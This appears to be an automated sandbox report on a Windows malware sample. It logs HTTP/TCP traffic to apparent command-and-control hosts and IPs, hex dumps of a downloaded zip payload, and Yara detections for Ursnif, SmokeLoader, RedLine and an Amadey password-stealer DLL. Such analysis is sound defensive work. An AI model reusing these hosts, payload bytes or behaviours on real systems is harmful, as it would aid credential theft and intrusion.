Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 19 Nov 2022 09:38:48 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 19 Nov 2022 09:39:12 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://debvplifcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: o36fafs3sn6xou.com
Source: unknown HTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.206.73:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.96.151.53:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.216.243.155:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49806 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: tiddsjj, 0000000B.00000002.378644024.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED Matched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
Detected potential crypto function
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040E054 0_2_0040E054
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040AD62 0_2_0040AD62
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040F105 0_2_0040F105
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040DB10 0_2_0040DB10
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040E054 11_2_0040E054
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040AD62 11_2_0040AD62
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040F105 11_2_0040F105
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040DB10 11_2_0040DB10
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B4130D 11_2_00B4130D
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00408C60 12_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040DC11 12_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00418CCC 12_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00406CA0 12_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004028B0 12_2_004028B0
